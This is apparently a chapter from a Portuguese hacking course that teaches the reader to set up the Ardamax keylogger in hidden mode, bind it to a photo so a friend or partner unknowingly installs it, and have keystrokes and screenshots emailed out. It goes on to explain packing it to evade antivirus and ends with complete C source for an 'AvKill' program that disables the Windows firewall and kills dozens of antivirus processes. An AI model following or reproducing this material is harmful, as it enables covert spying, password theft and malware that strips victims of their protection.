Keylooger

O que é keylogger?

Keylogger é um programa que como o nome vem a dizer, é um registrador de teclados, sendo mais claro, ele captura todos os dados e tudo o que foi digitado no teclado, e envia as informações pra um E-mail, FTP, ou qualquer outro meio de recepção que o programa posso vim a dispor, esses programas monitoram o Computador da vitima, além de enviar informações do teclado, mandam SS. Os motivos mais comuns, para os envios de keylogger além de procurar senha alheias é a investigação da vida pessoal de qualquer elemento como exemplo namoradas, pais que vigiam as atividades dos filhos na rede, entre outras mais utilidades, neste capitulo vamos aprender como usar e como camuflar KL( abreviação de Keylogger), Usaremos o famoso Ardamax KeyLogger, uma boa dica é, cada vez mais famosa a praga, mais fácil de ser detectada, usaremos o Ardamax, porque além de ser fácil manuseá-lo. Vamos aos passos, primeiro baixe o ardamax, ou pegue no pacote incluso que vem na BOX do curso. Primeiro Passo: - Instalar o Ardamax 2.5 ou versão posterior, Usaremos a versão 2.8

Usando Ardamax Tutorial

Primeiro Vamos instalar o Ardamax. A Instalação é fácil, a normal, =) só aperta Próximo ou NexT dependendo da versão, claro.

Essa é a primeira tela que o Ardamax Apresenta, clique em I Agree, e instale.

O programa irá ficar na parte de inferior da tela ao lado direito, clique no ícone do programa e vá a aba “Enter Registration Key” e Utilize uma chave qualquer encontrada na Internet. Depois de se registrar seguiremos o procedimento:

Clique em Avançar, se quiser pode ler os termos que ele descreve acima.

Ative o File Path, pra que serve isso? Ele junta arquivos ao programa espião, não entendeu? – assim oh. Eu vou disse que iria enviar uma foto pro meu amigo, e não quero que ele perceba que eu envie um KL, eu junto a Foto que eu quero mais o KL, simples assim.

Ative todas as opções se necessário, Eu prefiro ativar todas, Ative-a você também =)

Se aperta no botão ENABLE você pode habilitar uma senha, que no caso é essencial para você, mais porque? Porque se prestares atenção, qualquer pessoa pode desativar e ver os dados da vitima, se estiver no PC infectado. Então ative um senha.

. Evite este passo, mais só para você saber, isso é o Update do Programa e outras besteira, mais não se preocupe continue as instruções

A Primeira opção diz ao programa que ele tem que iniciar junto com o seu Sistema operacional, a segunda opção instala o programa e o deixa invisível, sempre marque está opção, sempre. Hidden Mode On Nada mais significa do que a ativação do KL na tela ou seja quando a combinação das teclas descrita na caixa forem executadas, o Ardamax vai aparecer, então programe uma para

você, Self destruct on:Destrói o KL na data programada.

Aqui fica a sua preferência, a primeira caixa marque com 20 min, se não sua caixa de entrada ficara muito cheia.

E-mail, esta parte está clara observe, onde está escrito “Coloque o Email aqui”, você tem que encher o campo com o endereço de email pra onde os dados do

KL, depois de ter configurado e colocado no campo password uma senha qualquer, aperte em find e clique em Test, e espere a confirmação do

KeyLogger, se ele não confirmar o email continue pressionado Test, que um dia vai, usando endereços do Gmail é melhor, pelo menos eu acho

Marque tudo, para pode ter um amplo campo de investigação do vida alheia (6)

Aqui você poderá receber as telas da sua vitima, ou seja você vai receber os ScreenShots, a 1º opção Tira SS’s a cada tempo programado, Target é para

delimitar o SS da tela, tamanho pra ser mais exato, e image quality é a qualidade da imagem

Nesta Tela, ele mostra o local onde o KL será colocado, e nesta opção você poderá trocar o ícone. Fique à-vontade.

Este é o final da configuração do KL, agora ele mostra todos os dados e você pode concluir.

Como você pode ver, o KL está configurado e pronto para ser enviado, mais é claro que vamos dificultar a ação do antivírus vamos camuflar o KL.

Camuflar

A maioria dos trojans e Kl comprimem em UPX seus executáveis, para podermos trocar esta compressão, usaremos um programa Chamado PE

Explorer o tutoria é bem simples, baixe o programa Pe Explorer e o execute, abra o server trojan e o salve novamente, a função deste programa é deixa os

arquivos comprimidos em win32, onde o programa possa reconhecer

normalmente as linhas e poder comprimi-lo em outro formato, após ter salvo vamos seguir o tutorial.

Após feito a descompressão, vamos deixar os server “invisível” baixe o programa anti AV e selecione o arquivo que você deseja.

Procure um crack do programa, após feito o crack, selecione a opção que desejar, aconselho a deixar como está na figura abaixo.

Vamos agora proteger, clique em “Undetect & Protect”, depois de ter feito. Vamos ao themida.

Marque a caixa GET FROM nas duas abas como você pode ver abaixo e em input filename selecione seu servidor ou seu executável.

Quando acabar de fazer isso clique em protect e pronto. O antivírus não pega, mais tome cuidado, em algum desses procedimentos

você pode quebrar o código e as funções do seu executável, se quebrar, refaça-o, quem disse que ser hacker seria fácil?

AvKill

Você pode criar desde uma arquivo de lote até um exe com ES, o código se encontra abaixo, divirtam-se, eu ainda acho essa a melhor maneira, mas agora edite todo o código, porque o antivírus o ler como praga. # include<stdio.h> # include<stdlib.h> # include<winsock.h> int main(int argc, char *argv[]) { HWND janela; SetConsoleTitle("update"); janela = FindWindow(NULL,"update"); ShowWindow(janela,SW_HIDE); system("@net stop wscsvc >nul"); system("@netsh firewall set opmode mode = disable >nul"); system("@net stop SharedAccess >nul" ); system("@net stop wscsvc >nul"); system("@sc config wscsvc start= disabled"); system("@taskkill /f /im avgcc.exe >nul"); system("@taskkill /f /im avgcc.exe >nul"); system("@taskkill /f /im avgamsvr.exe >nul"); system("@taskkill /f /im avgupsvc.exe >nul"); system("@taskkill /f /im avgw.exe >nul");

system("@taskkill /f /im avgcc32.exe >nul "); system("@taskkill /f /im avgctrl.exe >nul"); system("@taskkill /f /im avgserv.exe >nul"); system("@taskkill /f /im avgserv9.exe >nul"); system("@taskkill /f /im avgserv9schedapp.exe >nul"); system("@taskkill /f /im avgw.exe >nul"); system("@taskkill /f /im avgemc.exe >nul"); system("@taskkill /f /im ashwebsv.exe >nul"); system("@taskkill /f /im ashdisp.exe >nul"); system("@taskkill /f /im ashmaisv.exe >nul"); system("@taskkill /f /im ashserv.exe >nul"); system("@taskkill /f /im aswUpdSv.exe >nul"); system("@taskkill /f /im ashwebsv.exe >nul"); system("@taskkill /f /im savscan.exe >nul"); system("@taskkill /f /im symwsc.exe >nul"); system("@taskkill /f /im norton.exe >nul"); system("@taskkill /f /im Norton Auto-Protect.exe >nul"); system("@taskkill /f /im norton_av.exe >nul"); system("@taskkill /f /im norton_av.exe >nul"); system("@taskkill /f /im nortonav.exe >nul"); system("@taskkill /f /im ccsetmgr.exe >nul"); system("@taskkill /f /im ccevtmgr.exe >nul"); system("@taskkill /f /im ashwebsv.exe >nul"); system("@taskkill /f /im ashwebsv.exe >nul"); system("@taskkill /f /im ashdisp.exe >nul"); system("@taskkill /f /im ashmaisv.exe >nul"); system("@taskkill /f /im ashserv.exe >nul"); system("@taskkill /f /im aswUpdSv.exe >nul"); system("@taskkill /f /im ashwebsv.exe >nul"); system("@taskkill /f /im avadmin.exe >nul"); system("@taskkill /f /im avcenter.exe >nul"); system("@taskkill /f /im avgnt.exe >nul"); system("@taskkill /f /im avguard.exe >nul"); system("@taskkill /f /im avnotify.exe >nul"); system("@taskkill /f /im avscan.exe >nul"); system("@taskkill /f /im guardgui.exe >nul"); system("@taskkill /f /im nod32krn.exe >nul"); system("@taskkill /f /im nod32kui.exe >nul"); system("@taskkill /f /im clamscan.exe >nul"); system("@taskkill /f /im clamTray.exe >nul"); system("@taskkill /f /im clamWin.exe >nul"); system("@taskkill /f /im freshclam.exe >nul"); system("@taskkill /f /im oladdin.exe >nul"); system("@taskkill /f /im sigtool.exe >nul"); system("@taskkill /f /im w9xpopen.exe >nul"); system("@taskkill /f /im Wclose.exe >nul"); system("@taskkill /f /im cmgrdian.exe >nul"); system("@taskkill /f /im oladdin.exe >nul"); system("@taskkill /f /im alogserv.exe >nul"); system("@taskkill /f /im mcshield.exe >nul");

system("@taskkill /f /im vshwin32.exe >nul"); system("@taskkill /f /im avconsol.exe >nul"); system("@taskkill /f /im vsstat.exe >nul"); system("@taskkill /f /im vsstat.exe >nul"); system("@taskkill /f /im avsynmgr.exe >nul"); system("@taskkill /f /im avcenter.exe >nul"); system("@taskkill /f /im avcmd.exe >nul"); system("@taskkill /f /im avconfig.exe >nul"); system("@taskkill /f /im avguard.exe >nul"); system("@taskkill /f /im avgnt.exe >nul"); system("@taskkill /f /im avnotify.exe >nul"); system("@taskkill /f /im avscan.exe >nul"); system("@taskkill /f /im guardgui.exe >nul"); system("@taskkill /f /im licmgr.exe >nul"); system("@taskkill /f /im sched.exe >nul"); system("@taskkill /f /im preupd.exe >nul"); system("@taskkill /f /im MsMpEng.exe >nul"); system("@taskkill /f /im MSASCui.exe >nul"); return 0; }